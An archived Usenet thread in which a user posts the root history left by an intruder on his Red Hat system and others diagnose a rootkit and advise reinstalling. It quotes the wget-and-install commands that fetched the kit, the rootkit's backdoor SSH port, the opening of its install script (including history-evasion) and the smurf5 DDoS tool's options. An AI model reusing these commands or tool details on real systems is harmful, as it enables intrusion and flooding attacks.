Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Russian Hacker?

4 views
Skip to first unread message

Ryan

unread,
Mar 24, 2003, 1:16:41 AM3/24/03
to
Some guy got into my redhat 7.3 system. Here are the commands he ran
from the roots history;

wget www.geocities.com/iuli4n/Ci.tgz
tar xvzf Ci.tgz
rm -rf Ci.tgz
cd rk
./install
wget www.geocities.com/iuli4n/UsE.tgz
cd ..
dir -a
wget www.geocities.com/iuli4n/UsE.tgz
tar vxzf UsE.tgz
cd rk
./install

Any idea how to clean this up? I did a search on google, and I'm not
sure what he did, and I tried to locate the UsE.tgz file, but couldn't
find it or any files that it contains. Will updating to 8.0 solve
everything?

-Thanks in advance...

-Ryan

Andrew Lyon

unread,
Mar 24, 2003, 11:14:21 AM3/24/03
to
> Any idea how to clean this up? I did a search on google, and I'm not
> sure what he did, and I tried to locate the UsE.tgz file, but couldn't
> find it or any files that it contains. Will updating to 8.0 solve
> everything?

its a rootkit, your box has been compromised, your best bet is to erase and
start again by reinstalling redhat.


Sþer®Ð

unread,
Mar 24, 2003, 7:15:21 PM3/24/03
to
> Some guy got into my redhat 7.3 system. Here are the commands he ran
> from the roots history;
>
>
> Any idea how to clean this up? I did a search on google, and I'm not
> sure what he did, and I tried to locate the UsE.tgz file, but couldn't
> find it or any files that it contains. Will updating to 8.0 solve
> everything?
>
> -Thanks in advance...
>
> -Ryan

Look for open ports 1109 and 48484.
-----Ci.tgz
# This is ssh server systemwide configuration file.
Port 48484
-----UsE.tgz
# This is ssh server systemwide configuration file.
Port 48484
-----

If there open forget your current configuration en start installing from scatch!

First lines of the install script:

#!/bin/sh
unset HISTFILE
clear
echo
echo " This RootKit is made in Romania by [ KS ] and [ Xarian ]"
echo " Many tks to [ Megalight ] and all our friends from UnderNet"
echo " UseIT well Iulian!"
echo " EnJoY iT!"
echo
echo 'Let`s start to instal our Beauty '
USERID=`id -u`
echo "This install is ONLY for root so..."
if [ $USERID -eq 0 ]
then
echo "+++ We can go on!"
else
echo "+++ Nope, we can not go on in $USERID shell"
echo "This is an ROOTKIT you stupid and you must have uid=0"
exit
fi

Seems, to install, you have to have root privileges. Bad config on your end so
start all over. Updating does not resolve your problem.

Also got the Smurf DDOS exploit in it (smurf5)

Options
-p: Comma separated list of dest ports (default 7)
-r: Use random dest ports
-R: Use random src/dest ports
-s: Source port (0 for random (default))
-P: Protocols to use. Either icmp, udp or both
-S: Packet size in bytes (default 64)
-f: Filename containg packet data (not needed)
-n: Num of packets to send (0 is continuous (default))
-d: Delay inbetween packets (in ms) (default 10000)


--
EMail: LHS{$From}@RHS{$Message-ID}

0 new messages